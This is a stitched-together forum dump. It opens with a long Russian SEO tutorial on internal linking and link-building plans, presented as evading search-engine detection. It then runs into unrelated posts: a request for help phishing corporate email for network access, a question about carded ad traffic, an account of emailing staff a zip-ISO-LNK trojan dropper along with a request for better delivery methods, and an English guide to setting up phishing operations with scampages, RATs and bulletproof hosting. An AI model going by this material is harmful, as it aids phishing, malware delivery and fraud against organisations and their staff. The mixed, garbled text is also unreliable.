Предположим у нас есть пул слов: скачать 1, тут 1, софт 1, бесплатно 1. Если пользователь запрашивает запрос, скачать сеошный хороший софт бесплатно — поисковик смотрит, на странице встречалось слово «сеошный» , думает: «так, на странице есть слово «сеошный» а в тексте ссылок страницы есть слова: скачать, софт, бесплатно» и поисковик использует анкорный текст ссылок как дополнительную текстовую зону нашей страницы.
Благодаря текстам ссылок, странице можно присвоить внешнюю релевантность. И не важно, является ли сама ссылка с страницы нашего сайта или же с страницы внешнего сайта. Даже если эта ссылка находится внутри нашего сайта между страницами — она может передавать анкорную релевантность и благодаря правильным ссылкам внутри сайта мы можем влиять на релевантность страницы — это называетсяанкорная перелинковка.
Не стоит забывать, что ссылочное продвижение это абуз уже имеющихся релевантных страниц. Нет никакого смысла усиливать страницы ссылками если над ними не проведена внутренняя оптимизация.
Click to expand...
Когда стоит усиливать страницы ссылками?
Если мы занимаемся активным ссылочным продвижением, то стоит двигать страницы
которые уже попали в поисковую выдачу. По идеи, если мы провели на отлично всю
техническую и внутреннюю оптимизацию, то наши страницы должны заниматься
минимум 30-40 позиции и далее мы усиливаем эти позиции ссылками. Если же
страницы наши за 100ей поисковый выдачи, даже не пытаемся заниматься ссылочным
продвижением.
Начнем с внутренних ссылок, так как на их примере проще разобраться. Да и
вообще в целом процесс работы, что внутренних, что внешний весьма схож.
Внутренние ссылки — перелинковка
Перелинковка на основе Pagerank — распределения внутреннего веса.
Идея заключается в том, что мы считаем Pagerank по внутренним ссылкам и смотрим где вес накапливается, где вес теряется. После, стараемся перераспределить вес внутри сайта таким образом, чтобы наши основные продвигаемые страницы получали больше веса, а не важные страницы получали меньше веса.
Как перераспределяется вес?
Нам потребуется какой-нибудь сканер, чтобы посмотреть все внутренние ссылки,
ну что же? Начнем
В сайте аналайзере как раз есть такой отчет, называется Pagerank. Найти его
можно сверху, на скриншоте показан курсором. К тому же у сайт аналайзера есть
замечательная функция подсчета Pagerank. Кликаем правой кнопкой и выбираем —
рассчитать.
Сортируем по возрастанию и смотрим, что у нас вышло. На нашем примере, ребята действительно этим занимались, и вес распределен не равномерно. Основные страницы получают больше всего внутреннего ссылочного веса, и все в целом хорошо. Но что если бы ситуация была абсолютно противоположная?
Самый простой способ для влияния на распределение внутреннего веса — является сквозная навигация. Идея максимально элементарная, дело в том, что сквозная навигации расположена абсолютно на всех страницах — что в свою очередь значит, что на каждой странице есть ссылка. Если в меню есть не нужная нам страница, исключаем ее из меню, а еще лучше вообще от нее избавится. Выгодно держать в навигации самые полезные страницы сайта, стараемся при работе с небольшими сайтами в навигацию вставлять не более 100ссылок.
Более продвинутый варианты расчёта внутреннего ссылочного веса.
Нам понадобится Xena и программа для анализа ссылочных графов Gephi.
Ссылочный граф — это математическая модель в виде ребер графа ( гиперсылок) и вершин ( URL ). Мы уже видели пример графа, но для наглядности давайте еще раз посмотрим. Собственно PageRank и есть алгоритмы расчета узлов графа. Так сложилось, что структуру ссылочных связей очень легко представить в виде графов.
Не смотря, что Xena древний сканер в нем есть функция экспорта файла графа.
Экспортируем файл в Gephi и получаем таблицу
Теперь нам надо ее немного почистить перед тем как считать pagerank идем в фильтры и удаляем все css,js,jpg,png,svg.hph строки, должны остаться только html страницы.
После переходим в обработку и в обработке можем уже увидеть наш граф.
Далее заходим в статистику и нажимаем рассчитать Pagerank
Возвращаемся обратно в лабораторию данный, сортируем по убыванию и анализируем то что у нас получилось.
Выделяем мусорные страницы и ставим галочку, что нам от них нужно избавится.
Перейдем к более частным случаям
Начнем с того, что Pagerank считается только по уникальным ссылкам. То есть, если мы разместим 3 ссылки одного содержания на одной странице, лишь одна из них будет учитываться. Сейчас гугл не особо смотрит на положение ссылки по коду, а выбирает самую важную ( более вероятную для перехода ) и как правило эта ссылка должна находится в зоне основного контента.
Классические методы влияния на распределение внутреннего ссылочного веса
Мы уже осветили эту идею выше, простейший способ реализуемый путем создания сквозного блока ссылок. Сквозная линковка может быть спрятана не только в навигацию, но так же в блоки — лучшие статьи, лучшие товары, хлебные крошки, футер ( в футер лучше выносить те страницы, которых нет в основном меню )
Хабы имеют огромные ссылочный вес, ко всему прочему они раздаются огромное количество ссылочного веса. Типичный пример хаба — это главная страница. Вопрос который здесь нужно задать- это как распределиться тем весом, который раздает хаб?
Мы пониманием, что главная страница очень важная, и на главной странице мы можем делать подборки в зоне основного контента и раздавать ссылки на интересующие нас страницы, разделы.
Хабы мы можем создавать искусственно. Пример искусственно созданного хаба — это создание html карты сайта
html карта сайта — это просто хаб созданный для перелинковки. Реализуется путем создания страницу на который содержится список анкорных текстов с ссылками которые мы хотим прокачать. Чтобы этот хаб стал эффективным, необходимо добавить сквозную ссылку например в футер. Таким образом, на нем накапливается вес и после распределяется по нужным нам внутренним страниц. Хабы очень крутая штука — если нам надо прокачать ограниченный объем контента, который не вмещается в сквозную навигацию
Этот вид линковки часто описывается в книгах и статьях, но на практике, в чистом виде она встречается крайне редко.
Click to expand...
В чем суть? Ссылочная структура этого вида линковки ( кольцо ) выглядит следующим образом:
Смысл в том, что мы объединяем пул элементов последовательной связью, таким образом чтобы каждый элемент ссылался на следующий и предыдущий.
Обычно встречается на каких нибудь блогах где есть перелистывание : следующая статья — предыдущая статья. Кольцевая линковка на самом деле плохо справляется с задачей, и ее улучшенная версия — звездная линковка.
Тут уже интересней, помимо последовательной связи, каждая страница еще ссылается друг на друга. Куда бы не упал ссылочный вес в элементы звезды , ссылочный вес будет распределяться равномерно. Типичный пример линковки звездой это наша сквозная навигация. Если подумать, то линковать звездой мы можем ссылки в одном контентом блоке. Этот контентный блок будет отображаться на каждой из линкуемых страниц — тем самым отражать непосредственно структуру, что на картинке выше. Тоже самое можно делать с товарами.
Звезды работают хорошо до 15 страниц по моему опыту. Если страниц больше, обычно это на товарных сайтах, используем блоки: похожие и сопутствующие товары ( будет куча перекрестных ссылок). Это конечно уже далеко не звезда, но напоминает чем то структуру. Такая же схема работает на больших новостных сайтах с блоками: похожие статьи, новости.
Если мы видем, что много веса собирается там где не должно собираться — удаляем тупики. Тупики бывают разные, например у нас есть сайт-отзовик, и на какой-то странице о компании пользователи оставляют отзывы. Чтобы оставить отзывы нужно зарегистрироваться, и типичным тупиком будут внутренние ссылки на профилипользователей. Если мы дадим возможность пользователям переходить в профиль с отзывов ( что им вообще в целом не нужно ) эти профили будут сжирать вес. Все, что нужно сделать, это сделать профили пользователей не кликабельными.
Расширения анкорного листа
Второе название — линковка по ключевым словам.
Click to expand...
Этот алгоритм работает как с точки зрения внешний ссылок так и внутренних.
Поисковая система учитывает анкорные тексты внутренних ссылок, практически так же как ианкорные тексты внешних ссылок. Как следствие, мы должны этим пользоваться, и расширять семантику путем перелинковки. Но есть нюансы, опять же… Для того, чтобы ссылка срабатывала — она должна быть уникальной.
Как работает анкорная линковка?
Мы должны выяснить по каким словам и словосочетаниям мы хотим улучшить релевантность нашей посадочной страницы. Предположим у нас есть посадочная страница « Заказать smm продвижение в инстаграм » и у нас есть блог статей, и в блоге есть статья «Введение аккаунту инстаграм» , с помощью внедрения в статью анкорных текстов мы можем усилить нашу посадочную страницу. Как это выгладит?
Нам потребуется кусок семантики
Теперь берем и раскладываем кластер на слова формирующие его.
Вспоминаем, что на странице должны быть уникальные ссылки.
По этому, идем искать другие страницы где мы можем засунуть анкор
Предположим, что наш сайт — тот на котором мы проводили наши тесты.
Нам нужно найти страницы на котором встречается следующее слово из списка:
Продвижение
Нашли примерно нужную нам страницу, я выбрал «смм продвижение — цены».
Заходим на нее и ищем нужное нам слово
Вставляем внутрь ссылку, быть может даже дополняем анкорный текст доп.текстом и продолжаем таким образом расширять анкорный лист.
Коммерческие слова — лучше не использовать, так как есть вероятность получить
санкции со стороны поисковой системы.
Благодаря такому подходу, мы усилим наше ранжирование по низко-частотным и
средне-частотным запросам. Стоит учесть, что такая линковка работает — если
продвигаемой страницы нет в сквозном меню.
Ссылочное продвижение
Итак, мы подошли к самому интересному и вкусному блоку в концепте наших двух первых книг на форуме, а именно к продвижению проекта внешними ссылками.
Слегка пройдемся по уже реализованным пунктам оптимизации и продвижения сайта в поисковой системе, дабы ничего не упустить и удержать фокус на картине в целиком.
На выходе — если мы сделали все правильно то попадем в топ 20-30 поисковой выдачи. Но нам же этого мало, верно? Поэтому мы все это дело абузим ссылками, да не простыми… Давайте разбираться подробнее! Базово стоит усвоить пару вещей, таких как
Про яндекс мы поговорим позже, т.к он тоже их учитывает, но совсем иначе чем гугл + он обращает меньше внимания на этот фактор.
Click to expand...
Логика простая — если мы растем, значит мы работаем над сайтом и он становится более популярней. Если мы падает — значит мы не работаем над сайтом, и он становится менее популярным.
Уложили это в голове, и едем дальше…
Для начала нам необходимо познакомится с инструментами анализа ссылочной массы. Что касается тех сайтов, что принадлежат нам, здесь все достаточно просто. Тут или Яндекс вебмастер, или Google search console — раздел ссылки. Конкретно в этих разделах мы можем найти большую часть необходимой нам информации касательно состояния нашей ссылочной массы продвигаемого ресурса. Но за частую этого просто не достаточно, чтобы составить хоть какую-то внятную стратегию ссылочного продвижения, т.к нам необходимо больше данных ; особенно по топам интересующей нас выдачи.
К сожалению информацию по конкурентам мы не найдем в инструментах вебмастеров, поэтому стоит воспользоваться сторонними сервисами. Есть несколько ресурсов которые дают нам эту возможность, и лидером среди них является Ahrefs. На нем и остановимся
Возьмем какой-нибудь крупный сайтик с топ выдачи по сео, нам нужен инструмент site-explorer в Ahrefs, добавляем урл и смотрим инфу. На что нужно базово обращать внимание
кол-во всех ссылок ссылающихся на домен. Беков всегда больше, так как с одного донора может быть >1 ссылки
кол-во уникальных сайтов ссылающихся на домен ( именно этот показатель нас интересует больше, т.к для поисковой системы важны уникальные ссылки, каждая последующая ссылка с донора будет восприниматься как менее важная чем первая )
С этим разобрались, теперь перейдем к практической части — к построению ссылочного плана.
Стратегия ссылочного продвижения
За основу возьмем ключ «заказать сео продвижение» и соберем конкурентов из выдачи. Для целой картины спарсим топ 5 сайтов по этому запросу в гугле, а так же глянем что там происходит в выдаче яндекса.
Google топ выдачи по мск
1. https://www.mibok.ru
2. https://kokoc.com
3. https://dgtl-media.ru
4. https://serenity.agency
5. https://www.ashmanov.com
Yandex топ выдачи по мск
1. https://texterra.ru
2. https://cinar.ru
3.https://seosafe.ru
4. https://top10studio.ru
5. https://kokoc.com
Видим одно пересечение, я думаю будет интересно сравнить показатели ссылочной массы сайтов которые занимают топ гугла и яндекса соответственно. Ну что же, поехали…
Для начала создадим документ и соберем все беки и все доноры
Готово, теперь нам необходимо узнать сколько беков ссылается на главную страницу сайта, для этого идем в раздел — лучшие страницы
Ага, есть контакт. Собираем инфу из этой вкладки и отправляем в док-
По этой же аналогии нам необходимо выяснить все сочные посадочные страницы, на которые линкуют внешние ссылки
Я сделал выборку небольшую, с учетом главной — 5 страниц, для примера более
чем достаточно. Более ясная картина будет с выгрузкой 10-15 основных
продвигаемых страниц, где-то больше — все в зависимости от нищи.
Теперь мы будем рассчитывать доли. Нам необходимо понять процентное соотношение ссылок которые идут на все посадочные страницы.
Суммируем все бэки и выносим информацию в отдельный столбик. Прицепом захватываем так же кол-во доменов.
Итог мы получили общую сумму всех ссылок + домены
Дальше нам необходимо рассчитать доли
Суммируем все ссылки на главную и делим на общее кол-во ссылок, чтобы
зафиксировать формулу на все ячейки, вставляем $
Пример: (a1+b1+c1)/d$1
Итак, мы выяснили процентное соотношении ссылок на интересующие нас страницы конкурентов, теперь мы можем вычислить примерное кол-во ссылок которые необходимы нам для продвижения наших страниц.
Берем общую сумму и вычисляем среднеарифметическое.
Итак, мы знаем общее кол-во ссылок которые нам необходимы, на основе общего
кол-ва бэков мы можем рассчитать кол-во бэков на каждую страницу.
Для этого берем среднее значение — фиксируем строку через $ и умножаем на долю
которая должна получать страница.
Итог, мы выяснили общее кол-во ссылок и доноров, а так же выяснили необходимое кол-во ссылок на продвигаемые нами страниц
С этим закончили. Следующие факторы которые нас интересуют это:
1. Тенденции наращивания ссылок ( 1месяц/квартал/полгода/год )
2. Анкор-лист ( тот самый который мы разбирали в прошлой статье )
И на втором пункте мы остановимся более подробно.
Я думаю ни для кого не секрет, что наращивание ссылочной массы сеошниками - условно серая оптимизация. Поисковые системы очень внимательно следят за манипуляциями в этой области, поэтому наша задача создать как можно более естественный ссылочный профиль, дабы нас не заподозрили в чем-то нехорошем.
Примеры ссылок:
Брендовые ссылки : https://domen/url
Самый тривиальный формат, ведь представьте, вы обычный пользователь и хотите поделиться с кем-то нужной информацией, вряд ли вы будет зашивать ее в анкор и просто дублируете ее в сообщение, верно?
Click to expand...
Безанкорные ссылки : Здесь, тут, подробнее и т.д
Ссылка которая не несет в себе информационный смысл, анкор выступает в формате вводного слова, по сути данный вид ссылки вообще бесполезен для сео.
Click to expand...
Анкорные ссылки : SEO-Продвижение / Поисковая оптимизация сайта
Здесь пример тех самых анкоров которые нас интересуют.
Click to expand...
Собственно, для чего все это? Стоит понимать, что естественный ссылочный профиль не может быть собран исключительно из анкорных ссылок, именно здесь важно процентное соотношения разных типов ссылок к продвигаемому ресурсу. Запомнили и отложили где-то в голове, нам необходим создавать разнообразный ссылочный профиль — чтобы нас не спалили!
Вернемся к динамики роста ссылочной массы
В ахревс нас интересует вкладка новые доноры
Берем показатели за 30 дней, при более глубоком анализе квартал/полгода/год и вычисляем среднее
Собираем все необходимые значения и приступаем к расчету временных диапазонов ссылочной стратегии. Для этого берем общее среднее значение и делим на среднее значение темпа роста, и получаем кол-во месяцев
Итог — мы получили временные диапазоны, то кол-во времени которое нам потребуется для создания подобного ссылочного профиля нашего сайта.
Следующим шагом будет анализ анкоров листов конкурентов, для анализа нам необходимо их скачать, ну что же — приступим
Выгружаем анкор листы конкурентов и объединяем их.
У меня при выгрузке анкор листов, общее кол-во анкоров улетело за 3к, это
достаточно много и тратить время на их анализ не вижу смысла. Покажу концепцию
на примере небольшого анкор-листа
Эти столбцы можем удалить. Остальное переносим в наш файл гугл таблиц
Ставим фильтр и фильтруем по алфавиту, дальше вспоминаем какие типы анкорных
ссылок бывают и начинаем маркеровать ссылки.
Под мусором подразумеваем ссылки которые непонятного содержания и т.д, которые требуют более глубокого анализа, т.к возможно сайт взломан, или эти ссылки дело рук конкурентов, вариантов множество, сейчас тратить на них время не будем.
Проставили все маркеры
Дальше мы будем использовать цифры из головы, т.к здесь смысл рассказать принцип, а не проделать всю работу целиком. Мы будем вычислять доли анкоров, а так же все типы ссылок включая dofollow и nofollow ссылки
Выделяем столбец с ссылающимся донорами и в правом нижнем углу видим сумму (подгоним под наши значения в док-те и умножим допустим на 3— т.к я взял всего один анкор лист, а не 5 )
Условно у нас получилось 4653 ссылающихся доменов, а общее кол-во доменов исходя из статистики конкурентов 3953 — разница обусловлена тем, что с одного донора может быть >1 анкора, и это нормально. Собственно у нас есть общее значение от которого мы можем отталкиваться, возвращаемся во вкладку — Анкор лист. Ставим фильтр на нужный нам тип, и фильтруем док-т.
Дальше снимаем сумму с колонки ref.domains и подставляем в нужную нам графу, опять берем цифры из головы и едем дальше
Специально выделил строки красным, чтобы меня заклевали за подобные выходки, но да ладно. Общее кол-во есть, и есть частные показатели, теперь можем рассчитать доли
Стоит учитывать что мы высчитывали доли исходя из общего кол-ва уникальных доменов, а не беков. Для более продвинутого анализа, делаем все тоже самое, только из расчета беков.
Взяли среднее значение доменов и умножили на доли = профит.
Из дополнительных показателей мы не учли dofollow nofollow ссылки, собственно логика здесь абсолютно такая же, за исключением, что это ссылки нужно будет собирать в два разных док-та и считать по отдельности. В ахревс нас интересует все так же вкладка - анкоры, только с фильтрами по ссылкам
Экспортируем, объединяем и вычисляем доли. По тоже аналогии, что описана выше.
И последнее, что можно отнести к продвинутому анализу — это источники ссылок.
Для этого необходимо анализировать всех доноров и маркеровать их по категория.
Экспортируем всех доноров конкурентов — объединяем — удаляем лишнее
Переносим в гугл таблицы — чистим дубликаты и начинаем маркировать по типу сайтов… Согласен, задрота полная, но что поделать)
Ох и ах, сколько дерьма можно накопать. Парни явно хотят все здесь и сейчас)
Собираем инфу, вычисляем доли и используем эту информацию в своих целях.
Сразу отмечу, что все значения будут эмпирические, по факту собранная
информация будет отражать суть около темы, т.к или иначе — это лучше чем
ничего. В конечном счете у вас должен получится такой файл
+ссылочный план ( не плохо бы указать дату проставления ссылки )
Забыли совсем про Яндекс, давайте быстренько глянем, что там с яндексом и разберемся почему яндексу почти плевать на ссылки, или не плевать?
Сразу выделим господ — https://seosafe.ru , 100% накрутка пф, почти нет ссылок, топ 5 выдачи яндекса. Но так или иначе, считать что яндекс не учитывает ссылки и они не нужны, это не совсем правильно. Да, яндекс иначе относится к ссылочной массе, все разница с гуглом заключается в следующем…
Гугл считает ссылку как потенциальный переход, в то время как яндекс учитывает
непосредственно сами переходы. При этом последний приоритет отдает не
ссылочному профилю, а поведенческому фактору.
Ссылочный план
Итак, мы спарсили кучу информации и при анализе ссылочных профилей мы видим
огромный разброс в кол-вах ссылках. У нас есть явные лидеры и полные
аутсайдеры - но все они занимают топ 10 поисковой выдачи, разница между пиками
достаточно большая, посмотрим на примере:
Будем сравнивать конкретно доноров, давайте выпишем эти значения
201, 660, 60, 390, 840
60, 210, 390, 660, 840
Самое низкое значение в данной выборке - 60, самое высокое 840, это наши пики, между данными из этого ряда чисел мы можем выделить медиану, а именно сумму второго конкурента и четвертого ( 210+660 ) далее нам необходимо поделить это на два и мы получаем ( 210+ 660) / 2 = 870/2 = 435, сравним этот показатель с тем, что нам выдало среднеарифметическое
Здесь мы имеем среднее значение 430, при прочих равных высчитывая медиану мы получили 435. Если честно второе числовое значение мне нравится куда больше и сдается мне, что оно отражается действительность куда точнее, но для более глубокого анализа - медиана не совсем подходит, в связи с этим лично я накидываю 25-30% к числу которое вышло из среднеарифметического и отталкиваюсь от него.
Хочу заметить что для расчеты медианы удобно брать четное кол-во анализируемых групп, я специально выкинул третьего конкурента при расчете чтобы не работать с нечетной группой чисел. Для любителей математики, при расчеты медианы с нечетной группой чисел, берется среднее число и просто делится на два, при расчете ссылочной массы - это дерьмо не работает.
Теперь разберем частный случай, когда может пригодиться конкретно медиана и ничего кроме. Назовем это турбо-режимом анализа ссылочной массы.
Идем в ахревс и ищем инструмент keywords Explorer, внутри утилы вбиваем интересующие нас ключи
Получаем выдачу
Здесь мы видим основные показатели которые в целом тоже очень кстати, но сейчас нас интересует вкладка SERP - открываем
Итак, у нас есть условно кластер ( настройка и введения контекстной рекламы )
мы взяли самый жирный ключ и закинули его в тул, дальше смотрим серп, и что мы
там видим? Мы видим выдачу с кучей инфы которую мы можем анализировать, в
данном случае нас интересует доноры и медиана этих доноров. Берем 6
конкурентов с топ 10
20 - 9 - 5 - 14 - 61 - 16
расставляем в порядке возрастания
5 - 9 - 14 - 16 - 20 - 61
Медиана в этой последовательности чисел будет сумма 14 и 16
(14+16)/ 2 = 15 ссылок
Итог, на страницу «настройка и введения контекстной рекламы» нужно 15 ссылок.
Почему получается именно так?
Click to expand...
Все, что касается ссылок - это пальцем в небо. Изучая ссылочные профили конкурентов - мы хотя бы рисуем какой то контур, выделяем сектора - что лучше чем ничего, и все же - вся эта работа не отражает полноценную действительность. В лучшем случае точность ахревса составляет 70% и к сожалению это единственный способ проанализировать ссылочную массу конкурентов, если у вас конечно нет непосредственного доступа к их серч консоли. Кроме ахревса есть и другие сервисы, но лучше пока ничего не придумали. Имхо
Возвращаемся к нашему ссылочному плану
Через турбо режим посчитали кол-во ссылок, теперь нам нужна сумма. Вычислили
сумму, возвращаемся в вкладку с стратегией и забираем показатель темпа роста
13 ссылок в месяц, ну для диджитал этого маловато - давайте возьмем 20 ссылок в месяц.
Далее нам необходимо рассчитать кол-во ссылок, возвращаемся в наш ссылочный план и вычисляем доли
Теперь рассчитаем кол-во ссылок исходя из пропорций, что мы получили.
П-Профит, мы знаем сколько строить нам ссылок в месяц. Данный способ работает если нам нужно прям ну очень быстро, организовать ссылочный план, немного разбодяжим его методом тыка и получим следующее
Почему именно так? Отвечаю на вопрос - здесь у нас нет цели педантично
разработать ссылочную стратегию и ссылочный план, задача донести сущность
процесса и объяснить как все устроено. Итак, мы получили турбо план - возьмем
теперь какой-нибудь сайт для примера, хм - ну пусть будет mibok т.к у него
есть все необходимые нам страницы. Представим, что это наш сайт
Вспоминаем про типы анкоров, о которых упоминалось в статье выше, и добавим к этому, что вся эта движуха - прямая манипуляция с алгоритмами поисковой системы - наша задача не спалиться. По этому ссылочный профиль, делаем максимально естественным - к задаче под * добавим следующее: разбираться в алгоритме Google Penguin
Прописываем анкоры, сразу держим в голове, что процент брендовых анкоров должен быть в районе 70% от общей массы ссылок, возвращаемся в наш документ
Так, ну тут я чуток из космоса цифры взял, давайте их слегка поправим
Раз на бренд у нас идет по 70% ссылок, на безанкор пустим 20%, на анкор 10%
Угу, получилось следующее
И остались еще контентные блоки - это допустим, видео и картинки, накинем по 1 проценту с анкорных и безанкорных - анкоров.
Это уже больше похоже на правду, естественно если строите ссылочную стратегию как чертовы фрики, вы выясните точное соотношение всех типов анкоров к общему числу ссылок. А так же соотношение dofollow and nofollow ссылок - оставим эту на ваше свободное время.
Выдергиваем с этого документа непосредственно сами доли анкоров и переносим в наш ссылочный план
Посчитали доли, получили пропорции конкретных анкор - ну и поехали строить ссылочный план
Нам надо 14 анкоров, окей, прописываем 14 анкоровов
Отлично, теперь давайте эти брендовые анкоры чуток изменим
Отлично, наша задача сделать максимально естественный ссылочный профиль,
держим эту мысль на протяжении всего строительства.
Переходим к безанкорным ссылкам, нам нужно их 4
Теперь нам необходимо вписать анкоры, хочу акцентировать внимание - вписывать прямое вхождение ключа - не стоит, хотя... иногда можно
Смотрим, нам надо вписать 2 анкора, берем ключ - Создание интернет магазина под ключ
Теперь самое интересное, надо как то разбить этот ключ на несколько частей и вписать его в рамках своего кластера
Допустим пусть будет так, и у нас осталась последняя ссылка под картинку или
видос, отправляем ее в контент
Далее рандомезируем ссылочный план с помощью вкладки Данные - перемешать ячейки диапазона - и получаем
Приведем это в человеко-понятный вид и наконец то получим ссылочный план
По хорошему необходимо рассчитать еще доли dofollow и nofollow ссылок, если вы такой же фанатик как я - делайте, к плану я бы еще добавил тип сайта и непосредственно источник от куда пришла ссылка. Наша команда разрабатывает ссылочную стратегию вместе с планом - параллельно с семантическим ядром, и по факту с этих документов стартует сео оптимизация с последующим продвижением.
Всем привет. Новичок в этой теме. Хочу влететь. Есть желание и цели. Хочу пойти в направлении фишинга/спама на корп почты для получения доступов к сети. Подскажите что можно почитать, какие инструменты рассмотреть, самое банальное место где брать корп мейлы и где как потрениться можно, чтобы письмо попадало в инбокс? Не прошу супер привата, а базовым вещам буду рад
Здравствуйте, хочу рассказать вам как же создавать Google ADS
Объяснить зачем нужен фарм.
В общем, добро пожаловать!
Это новая статья от Traffic Cartel!
Ссылка удалена
Запрещена реклама сторонних ссылок/урлов/проектов/групп/форумов
Click to expand...
добрый день , ребят девчат помогите разобраться с таким вопросом) у меня есть пару сайтов , покупаю трафик у человека в телеграмме он льёт 50-80к посещаемости сутки на каждый сайт , вопрос вот в чём: где человек берёт такое количество посещаемости? бот-трафик (что оно такое, способы добычи ) , думаю на басе такое не сделать ! заранее спасибо за помощь.
Добрый день!
Я владею сайтом, его ссылки индексируются в гугле, с каждым месяцем растет органический приток людей с поиска гугл.
Если мне начнут лить трафик с карт(кардинг) через гугл эдс, какие риски для моего сайта могут быть ?
Сказывается ли это как-то на самом сайте(придут в гости / заблокируют домены и тд) или же только на рекламных аккаунтах, откуда будут отливать трафик ?
Такой же вопрос касаемо ФБ , если там начнут лить на сайт через кардинг , какие риски для владельца сайта и домена , либо страдают только акаунты с которых отливают ?
У кого был опыт, подскажите, какие могут быть последствия и как этого избежать ?
Спамил с корпоративной почты всем сотрудникам организации используя BCC. Сперва все шло гладко, приходили оповещания о прочтении и я точно знаю что один человек успешно скачал и открыл архив . Но через 1.5 часа начали приходить временные письма-ответы вида
Code:Copy to clipboard
Subject: Тест
Message: Антиспам. С наилучшими пожеланиями
от кого-то из IT отдела в сопровождении телеметрии от Microsoft и моё письмо
получило приставку LNK/Agent.WG trojan.
Структура файла-доставщика такова:
Code:Copy to clipboard
zip архив (незашифрованный) -> iso -> lnk
В домашних тестах все было более-менее впорядке: Windows при открытии файла хоть и предупреждал, что он из интернета, но не блокировал его. Сейчас же даже если и удастся скачать архив, то монтировать iso файл Windows напрочь отказывается без каких-либо объяснений. Я знаю что можно попытать зашифровать архив, но это лишний шаг для пользователя при открытии + Defender начал блокировать монтиование iso файлов содержащих lnk, которые пришли из интернета.
Может кто поделиться каким-то другими методами доставки по почте? Или подсказать что я не так делаю в описанном выше методе (не слать мэйлы IT отделу - и так понятно)? Этим методом 100% пользовались до меня и он вроде как работал.
What 's Phishing/Spamming?
Phishing/Spamming is a cybercrime technique where attackers attempt to deceive individuals into providing sensitive information, such as login credentials, personal details, or financial information. Phishing attacks often involve creating fake websites or messages that mimic legitimate entities to trick users. Here's a general overview of how phishing works:
Setup and Preparation :
Attackers set up a phishing campaign by creating a fake website, email, or
message designed to mimic a legitimate service, organization, or individual.
Email or Message Delivery:
Phishing attacks commonly begin with an email or message sent to a large
number of potential victims. This message may appear to come from a trusted
source, such as a bank, social media platform, or government organization.
Social Engineering Tactics:
The phishing message often employs social engineering tactics to create a
sense of urgency, fear, or curiosity. For example, it might claim that there's
a security issue with the user's account or offer a special deal to entice the
user to click on a link.
Fake Websites or Forms:
The phishing message contains a link that directs users to a fake website,
which closely resembles the legitimate site it's impersonating. This website
may include login pages, forms, or other elements designed to capture user
input.
Information Capture:
When users interact with the fake website, they are prompted to enter
sensitive information such as usernames, passwords, credit card details, or
other personal data. Unbeknownst to the user, this information is captured by
the attackers.
Credential Harvesting:
The attackers collect the entered credentials and use them to gain
unauthorized access to the victim's accounts or commit identity theft.
Propagation:
In some cases, successful phishing attacks lead to further propagation.
Attackers may use compromised accounts to send additional phishing messages to
the victim's contacts, expanding the scope of the attack.
Avoiding Detection:
Phishers often use various techniques to avoid detection, such as creating multiple copies of the phishing website, frequently changing domain names, or using encryption to hide malicious content.
What's Next.
How To Became A Professional Spammer And What Tools
Needed...!!
Here is tools needed for your spamming setup but depend on what you want to spam!
1- vps
host
2- scampage
script
3- email
sender
4-
smtp
5- mask fudlink and ope
redirect
6- letter
encryptor
7- sms
sender
8- smtp to sms or gateway api- but i recommended smtp to
sms.
9- buy professional
domain
10- Scampage obfucation scampage script
unscape.(qbot)
11- Leads - either phone number or
email
12- debounce back validate make sure you purchase with new
apikey.
13- sms phone number
validator
14- Telegram Bot is the best for results panel.google how to create telegram
bot.
15- Leads
sorted.
16- RDP with proton vpn or pia
vpn
17- H-RDP Malware
Rat.
18- Letter
html.
What 's Is Mhe Most Common Companies Spammer/Hackers Target?
Below is most target companies:
-Office
365 script page $-link
-Telstra
Business Webmail $-link
-Business
target webmail script page $-link
-Netflix
script page $-link
-Bank
script page$- link
-Godaddy
script page $-link
-Rackspace
script page $-link
-Cryppto
script pages $-link
-Alibaba
script page $-link
-Telus
$-link
-Microsoft
Store $-link
-ATT
$-link
#You Can Find Legitmate Programmer On Forum To Build One of the list scripts for You Or buy pre-build scripts -#..!
How to configure your host-lab you bought from bulletproof vps service. i recommended do not use WHM-cpanel.. it's easy for anti-spam forences to brute force with contents discovery tool and find your files directory, when you spam someone that has IT skills, i recommended anonymous Bulletproof VPS with open source hosting file, you can reconfigure that yourself if you know what you are doing with help of google search or you can buy pre-made host from legitmate vendor's.
Setting up a Virtual Private Server (VPS) involves several steps. Below is a general guide on how to set up a VPS host. Note that specific steps may vary depending on your VPS provider and the operating system you choose. This guide assumes you have already acquired a VPS subscription.
You need putty or wls to access your vps and configure your Host-Lab-Panel
It's good advice to check the reputation of your VPS host's IP address, especially if you're planning to use it for email services or other online activities. Services like Spamhaus maintain blacklists of IP addresses known for sending spam or engaging in malicious activities.
If you find that your VPS host's IP address is listed on a spam blacklist, it's important to take action to resolve the issue. Here's a more detailed guide on what you can do:
1. Check IP Address Reputation:
Visit the Spamhaus website or use their services to check the reputation of
your VPS host's IP address: Spamhaus Blocklist Removal Center.
2. Confirm the Blacklist Status:
If your IP address is listed, carefully read the information provided to
understand the reason for the listing.
3. Contact Your VPS Provider:
Open a support ticket with your VPS hosting provider.
Provide them with details about the blacklisted IP address and request
assistance in resolving the issue.
4. Request an IP Address Change:
If the IP address is consistently blacklisted, you might consider requesting a
new IP address from your VPS provider.
5. Improve Security:
Evaluate and improve the security of your VPS to prevent future issues.
Ensure that your server software is up to date and secure.
Implement strong authentication mechanisms.
Regularly monitor your server for suspicious activities.
6. Verify Removal from Blacklist:
After taking corrective actions, use the Spamhaus website or similar services
to verify that your IP address has been removed from the blacklist.
7. Implement Best Practices:
Follow best practices for securing and maintaining your VPS to avoid future
blacklisting.
8. Monitor Regularly:
Periodically check the reputation of your IP address to catch any issues
early.
Remember that actively addressing blacklisting issues is crucial for
maintaining a good online reputation and ensuring that your legitimate emails
or services are not affected.
Waht's Next..............
1. Log in to Your VPS Provider's Dashboard:
Access the dashboard provided by your VPS hosting provider using the
credentials they provided.
2. Select and Deploy a VPS Instance:
Choose the specifications for your VPS instance, such as the operating system,
resources (CPU 4, 8 GB Memory, 60 GB Storage, 10 Gbps DDOS Protection, Ubuntu
20.04 or 22.04), and data center location.
Deploy the VPS instance.
3. Access the VPS via SSH:
Once deployed, connect to your VPS using SSH. Most VPS providers offer an SSH
key or a password-based authentication method.
bash
Copy code
ssh username@187.87.94.89 Next prompt do not
panic type yes and copy and paste your vps passwords!
4. Update and Upgrade Packages:
Update the package lists and upgrade the installed packages.
bash
Copy code
sudo apt update
sudo apt upgrade
5. Secure Your VPS:
Change the default SSH port for added security.
Set up a firewall to control incoming and outgoing traffic.
6. Configure Timezone and Locale:
